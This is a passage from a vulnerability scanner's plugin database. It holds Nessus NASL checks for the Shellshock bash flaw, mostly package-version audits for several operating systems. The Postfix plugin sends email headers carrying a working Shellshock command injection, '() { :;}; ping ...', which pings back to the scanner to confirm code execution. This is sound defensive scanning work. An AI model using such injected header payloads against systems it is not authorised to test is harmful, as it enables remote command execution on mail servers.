flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-doc\", reference:\"4.1-3+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bash-static\", reference:\"4.1-3+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The remote host appears to be running Postfix. Postfix itself is not vulnerable to Shellshock; however, any bash script Postfix runs for filtering or other tasks could potentially be affected if the script exports an environmental variable from the content or headers of a message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts Postfix may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Postfix Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:postfix:postfix", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_POSTFIX_FILTERS.NASL", "href": "https://www.tenable.com/plugins/nessus/77969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77969);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Postfix Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server uses scripts that allow remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Postfix. Postfix itself is not\nvulnerable to Shellshock; however, any bash script Postfix runs for\nfiltering or other tasks could potentially be affected if the script\nexports an environmental variable from the content or headers of a\nmessage.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nPostfix may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the Postfix scripts.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postfix:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not postfix\nispf = get_kb_item(\"SMTP/\"+port+\"/postfix\");\nif(isnull(ispf) || !ispf) audit(AUDIT_NOT_DETECT,\"Postfix\",port);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\",\n \"\" # For the actual text of the email\n);\n\n# Build the attack data\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\n# Do the SMTP boogaloo, for postfix FROM/TO have to be valid\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Postfix\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif(empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif(hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif(header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif(report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:37", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-594.NASL", "href": "https://www.tenable.com/plugins/nessus/78590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-594.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78590);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:41", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126547 patch-revision plugins, or deemed non-security related.", "cvss3": {}, "published": "2012-09-17T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 126547-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_126547.NASL", "href": "https://www.tenable.com/plugins/nessus/62115", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62115);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (x86) : 126547-10 (deprecated)\");\n script_summary(english:\"Check for patch 126547-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126547 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126547-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126547 instead.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:11", "description": "The remote host is running a version of Mac OS X 10.8 or 10.9 that does not have Security Update 2014-005 applied. This update contains several security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {}, "published": "2014-10-17T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3566", "CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2014-005.NASL", "href": "https://www.tenable.com/plugins/nessus/78551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78551);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137, 70574);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-10-16-2\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8 or 10.9 that\ndoes not have Security Update 2014-005 applied. This update contains\nseveral security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as\n Shellshock. The vulnerability is due to the processing\n of trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. A MitM attacker can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT203107\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/533721/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2014-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = '2014-005';\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:'-');\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8 / 10.9\");\nelse if (\"Mac OS X 10.8\" >< os && !ereg(pattern:\"Mac OS X 10\\.8($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mountain Lion later than 10.8.5.\");\nelse if (\"Mac OS X 10.9\" >< os && !ereg(pattern:\"Mac OS X 